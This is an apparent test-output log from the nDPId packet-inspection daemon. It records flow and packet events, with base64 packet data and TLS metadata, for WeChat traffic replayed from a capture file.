+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwNAAEAG0kHAqAFny82XotNFAbtA8usy6z8oEoARAOWo0QAAAQEICgAwuptF0ZJx"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZmlAAEAGrtPAqAFny82XotNJAbvI4NzyAAAAAKACchB6zAAAAgQFtAQCCAoAMLqbAAAAAAEDAwc="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353937,"flow_last_seen":1492167353937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353937,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1492167353937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353937,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8a3xAAEAGqcDAqAFny82XotNKAbuhD9GmAAAAAKACchCtqQAAAgQFtAQCCAoAMLraAAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vARAACwGbKDLzZeiwKgBZwG700XrPygSQPLrM4ARAHCW2wAAAQEICkXRpNsAMLqb"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwRAAEAG0kDAqAFny82XotNFAbtA8usz6z8oE4AQAOWWFAAAAQEICgAwuu1F0aTb"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1492167354046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354046,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK49AAC4G+vDLzZfTwKgBZwG7nyV4LkCkZw70h1AQAHPUZwAA"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} +00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zz
iP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} 
